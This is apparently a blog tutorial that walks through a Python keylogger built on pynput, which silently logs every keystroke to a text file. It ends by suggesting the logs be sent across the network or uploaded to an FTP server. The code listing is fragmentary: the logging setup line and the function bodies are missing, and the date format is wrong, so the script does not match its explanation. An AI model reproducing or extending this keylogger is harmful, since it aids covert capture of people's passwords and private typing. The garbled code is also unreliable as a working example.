In this tutorial, you will learn how to write a keylogger in Python. A keylogger is a type of surveillance tool used to monitor and record each keystroke typed on a specific computer’s keyboard.
When it comes to the legality of Keyloggers and other hacking tools, are legal to possess. However, installing it on a computer, even your personal computer, can expose you to legal trouble. If you let anyone else use your computer without disabling the keylogger, or not inform them that it is active, you are likely violating federal law. The goal of this tutorial is for security awareness and educational purposes.
Implementing the Keylogger
This is the full Keylogger.py script.
from pynput.keyboard import Key, Listener
import logging
datefmt='%Y-%d-%M %H:%M:%S',
format='[{asctime}]: {message}')
def on_press(key) -> None:
def on_release(key) -> bool:
if key == Key.esc:
return False
with Listener(on_press=on_press, on_release=on_release) as listener:
Code Explanation
Lines 1-2: Importing Required Libraries
from pynput.keyboard import Key, Listener
import logging
: This library allows you to control and monitor input devices.logging
: This library is used for tracking events that happen when some software runs
Lines 5-9: Basic Log Configuration
datefmt="%Y-%d-%M %H:%M:%S",
format="[{asctime}]: {message}")
Here we create basic configuration for the logging system. We will specify the filename where keystrokes will be recorded as keystroke_log.txt
followed by specifying the format in which the keystrokes will be stored which will be:
[YYYY-MM-DD HH-MM-SS]: 'key'
Lines 12-13: Defining On_Press() Function
def on_press(key) -> None:
The function takes key
as an argument, which is the key pressed by the user, and logs it into the file after converting it into a string.
Lines 16-18: Defining the On_Release() Function:
def on_release(key) -> bool:
if key == Key.esc:
return False
The function takes key
as an argument, which again is the key pressed by the user, and will terminate the Keylogger program if the Esc key
is passed as an argument.
Lines 21-22: Getting Keystrokes
with Listener(on_press=on_press, on_release=on_release) as listener:
We create an instance of a Listener which would be recording keystrokes and pass the function we created as an argument. Then we use the .join()
method to join it to the main thread. Therefore, every time a key is pressed, the listener is activated and it calls our function which then logs our keystrokes into the file.
Running The Python Keylogger
Run the program:
$ python keylogger.py
Once the program is launched, you will not notice any activity. The program is running in the background. Just begin to type; when you are ready for the program to terminate, just press the Esc
key. Once you do, you will notice a new file was created, keystroke_log.txt
. This is the file that contains all of the recorded keystrokes.
Examining the keystroke_log.txt File
Below is a screenshot of my keystroke_log.txt
file which shows my captured keystrokes:

Now you know how to construct a basic keylogger. This program can be extended to send log files
across the network or even uploaded to an FTP Server where you can download it later for use. Remember, this tutorial and Keylogger script are strictly for educational purposes and it shouldn’t be employed for malicious purposes. Please leave like
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